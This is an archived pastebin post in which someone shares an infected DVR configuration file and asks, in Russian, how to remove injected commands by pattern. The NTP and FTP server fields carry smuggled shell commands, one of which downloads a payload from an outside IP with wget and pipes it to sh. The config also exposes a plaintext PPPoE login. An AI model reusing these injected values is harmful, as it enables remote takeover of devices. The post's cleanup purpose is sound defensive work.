Archive of https://pastebin.com/5T9LN2VU

1. # archive of https://pastebin.com/5T9LN2VU
2. # seeing similar exploits in the wild
3.  
4. есть такой конфиг
5. <?xml version="1.0" encoding="UTF-8"?>
6. <DVR Platform="Hi3520">
7. <Service>
8. <DHCP Enable="False"/>
9. <Static Enable="False" IP="192.168.10.8" Mask="255.255.255.0" Gateway="192.168.10.1" DNS="8.8.8.8"/>
10. <PPPoE Enable="True" User="88284187@hinet.net" Password="2dgurlou"/>
11. <Mobile Enable="False" User="" Password="" PIN="" APN="" Dial=""/>
12. <HTTPD Enable="True" Port="80" SSLPort="443" RTSP="False"/>
13. <DDNS Enable="False" Server="dyndns.org" Format="http://&lt;user&gt;:&lt;pass&gt;@members.dyndns.org/nic/update?hostname=&lt;host&gt;&amp;myip=&lt;ip&gt;" Host="" User="" Password=""/>
14. <NTP Enable="True" Interval="86400" Server=" & sh /zconf/dvr_help"/>
15. <Mail Enable="False" Server="" SSL="False" Port="25" User="" Password="" From=""/>
16. <FTP Enable="False" Server="time.nist.gov&amp;wget http://188.209.49.244/f -O-|sh" Port="21" Username="" Password="" Directory=""/>
17. <QoS Enable="False" Limit="8192"/>
18. <P2P Uid="" Expiry=""/>
19. <Wifi Enable="False" ESSID="" Password=""/>
20. </Service>
21. </DVR>
22.  
23. надо удалить ;wget http://188.209.49.244/f -O-|sh по маске. адреса могут быть разные
24. возможно где-то пробелы еще